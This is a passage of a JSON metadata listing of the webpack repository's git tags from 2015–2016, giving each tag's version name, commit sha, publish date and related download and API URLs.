ag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebp